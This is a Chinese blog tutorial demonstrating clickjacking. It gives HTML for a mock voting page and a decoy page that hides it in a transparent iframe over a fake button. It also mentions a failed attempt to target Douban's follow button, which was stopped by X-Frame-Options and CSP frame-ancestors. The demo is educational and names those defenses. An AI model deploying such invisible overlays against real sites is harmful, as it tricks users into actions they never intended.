内容简介:一个关于点击劫持的小示例,首相看下理论知识首先,制作一个功能页面,作为被iframe嵌套的功能页面;这个页面的功能就是模仿投票功能,点击按钮时,即可完成投票功能,控制台会同步打印出操作信息。制作一个只有图片的页面,用于迷惑用户进行交互;
一个关于点击劫持的小示例,首相看下理论知识
项目思路
首先,制作一个功能页面,作为被iframe嵌套的功能页面;这个页面的功能就是模仿投票功能,点击按钮时,即可完成投票功能,控制台会同步打印出操作信息。
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> <style> .vote{ width: 183px; margin: 0 auto; margin-top: 220px } </style> </head> <body> <div class="vote"> <input type="text" value="5号选手"> <button>投票</button> </div> <script> var span = document.getElementsByTagName('button')[0] span.addEventListener('click', function(){ console.log('哈哈,谢谢你偷偷帮我投票~') }) </script> </body> </html> 复制代码
制作一个只有图片的页面,用于迷惑用户进行交互;
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>click jacking demo</title> <style> body { padding: 0; margin: 0 } .png { height: 100%; width: 100%; } .iframe { width: 1440px; height: 900px; position: absolute; top: -0px; left: -0px; z-index: 3; -moz-opacity: 0; opacity: 0; filter: alpha(opacity=0); } .btn { display: inline-block; padding: 2px 3px; background: burlywood; color: #fff; position: absolute; top: 221px; left: 766px; z-index: 2; cursor: pointer; border-radius: 30% } </style> </head> <body> <img class='png' src="./image/clickme.jpeg" alt=""> <iframe class="iframe" src="./iframe.html" scolling='no' allowTransparency="true"></iframe> <span class="btn">click</span> </body> </html> 复制代码
浏览器打开,会发现根据提示点击按钮,会在控制台中打印了相关的信息,就是说,即使我没有在功能页面进行投票操作,可是能投票。
在迷惑页面中把 iframe
的 opacity
属性值修改成 0.3
,就能看到这个迷惑的原因了。
其他
本来想做个坏事的,想要试试用于豆瓣上,直接定位到关注按钮那,不过 iframe 豆瓣的页面时,控制台报错了,这个想要说明的是使用设置 X-frame-options
属性是真有效的。
也试过直接内嵌 github
的地址,也会报错,这个错是报跨域的错,不过具体的还不知道是怎么设置防御的。
an ancestor violates the following Content Security Policy directive: “frame-ancestors ... 复制代码
至此,已经把 点击劫持
的形式演示完毕
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- etherscan点击劫持漏洞
- 点击劫持防御方案
- 曲速未来 消息:etherscan点击劫持漏洞分析
- 挖洞经验 | 价值$7500的Google MyAccount服务端点击劫持漏洞(Clickjacking)
- Gradle Plugin Portal:结合点击劫持和CSRF漏洞实现帐户接管
- angular2手动点击特定元素上的点击事件
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Network Algorithmics,
George Varghese / Morgan Kaufmann / 2004-12-29 / USD 75.95
In designing a network device, you make dozens of decisions that affect the speed with which it will perform - sometimes for better, but sometimes for worse. "Network Algorithmics" provides a complete......一起来看看 《Network Algorithmics,》 这本书的介绍吧!